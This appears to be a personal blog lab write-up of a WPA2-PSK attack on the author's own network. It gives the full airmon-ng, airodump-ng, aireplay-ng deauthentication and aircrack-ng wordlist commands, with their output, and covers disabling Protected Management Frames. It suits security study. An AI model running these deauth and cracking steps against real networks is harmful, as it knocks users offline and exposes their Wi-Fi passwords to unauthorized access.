2025-02-20 Hacking your Wi-Fi

Today I will be practicing WPA2-PSK security and attempting to extract and crack a PSK hash. Let’s get started.

Caution

I am not responsible for any malicious, unethical, or destructive behavior done by anyone following this post. I cannot guarantee any of the tools I use are safe. All readers should practice extreme caution when attempting anything written here. You can go to jail if you do not act within the proper scope. All of these exercises were done on personal networks that I had authorization to test.

Note

This post took inspiration from the following book: Network Basics For Hackers by OccupytheWeb, Master 2023

Step 1 Setting up

First, we need to install a few tools:

• aircrack-ng

  aircrack-ng is one of the most essential tools for any cybersecurity professional. It contains almost everything a hacker needs to monitor and pentest a wireless network.

  We will also be using airmon for finding BSSIDs and intercepting traffic. Airmon comes in the aircrack-ng suite so no installation is needed.

Step 2 Compiling

I simply needed to run: sudo emerge aircrack-ng

Step 3 Starting aircrack-ng

First, we need to figure out what our wireless interface is called. We can run ifconfig to see that my interface is named wlan0.

The next thing we need to do is start aircrack-ng and put our WLAN adapter into monitor mode with the following command:

airmon-ng start wlan0

This deleted our wlan0 interface and replaced it with wlan0mon. Now let’s intercept a handshake to get our PSK (Pre-Shared-Key) hash.

Now, for the purpose of this lab, I will be connecting my phone to the network I am attacking. Its MAC will be “22:8F:1B:9A:10:51”; our AP will be “12:34:56:78:9A:BC”.

First, we need to monitor the network. We can run:

sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 6 -w capture_file wlan0mon

We will get a TUI output like this:

CH  6 ][ Elapsed: 1 min ][ 2025-02-21 11:39

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

12:34:56:78:9A:BC -41 100      675        0    0   6  360   WPA2 CCMP   PSK  my_network

BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

12:34:56:78:9A:BC  22:8F:1B:9A:10:51  -46    0 - 1      0      1863

Let’s break down the important flags here.

Beacons: 675 A beacon is the AP’s way of telling other devices “I exist, come connect,” so we know for sure the AP is up and accepting connections.

We can also see our network uses WPA2-PSK, so we can continue with the attack.

Step 4 Deauth

While we keep our monitor program running, let’s try to deauth my phone. We can run the following command to send deauth packets to my phone’s MAC:

sudo aireplay-ng --deauth 500 -a 12:34:56:78:9A:BC -c 22:8F:1B:9A:10:51 -D wlan0mon

If it is successful, we will see an output like this:

11:37:30  Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|13 ACKs]
11:37:31  Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|22 ACKs]

Step 5 Coming to terms

At this point, we realize that our router has Protected Management Frames (PMF) enabled. We know this by filtering Wireshark. We can inspect our wlan0mon beacons and find the RSN/Auth information:

Auth Key Management (AKM) Suite Count: 1
    Auth Key Management (AKM) List 00:1a:2b (IEEE 802.11) PSK

A PMF is a security measure which provides protection for unicast and multicast management action frames which would prevent this type of deauthentication attack [1].

BUT for the sake of this lab, we can disable this and get hacking.

Step 6 Redemption

Now that I have set up a badly configured router (don’t worry, it stays on the LAN only), we can actually proceed with the deauth attack.

I will connect my phone to our Wi-Fi network and run the following command:

sudo aireplay-ng --deauth 1000 -a 12:34:56:78:9A:BC wlan0mon

Note

I could pass my phone’s MAC (hence the warning), however, this way would disconnect every device from the network.

Step 7 Stealing the password

After sending our deauth packet, we will monitor our network with airodump-ng to intercept the 4-way handshake our phone makes after the deauth attack ends.

Now we need to send our deauthentication packets until we see WPA handshake: XX:XX:XX:XX:XX:XX appear in the top right corner of our airodump-ng interface.

CH 6 | Elapsed: 42 s | 2025-02-22 01:48 | **WPA handshake: 12:34:56:78:9A:BC**

Once we see this, we can safely kill the attack and the monitor since we have intercepted the PSK hash.

Step 8 Getting the password

Now all we have to do is crack the password. For this, we will use aircrack-ng. We will also need a wordlist. I will be using the 10k most common password list for this lab. To begin brute forcing, we will run:

aircrack-ng netgeargetpsk-01.cap -w ../../lists/10kcommon.txt

And in about 2 seconds, we can see the password in cleartext!

                         Aircrack-ng 1.7

[00:00:00] 8776/10000 keys tested (18813.56 k/s)

Time left: 0 seconds                                      87.76%

                     KEY FOUND! [ password ]

Conclusions

When I first started learning networks, I didn’t think I would ever enjoy learning how Wi-Fi worked, but this lab has made me realize wireless networks are one of the most interesting parts of networking. I am considering trying a Bluetooth-based attack next.

Sources

[1]

https://www.wi-fi.org/knowledge-center/faq/what-are-protected-management-frames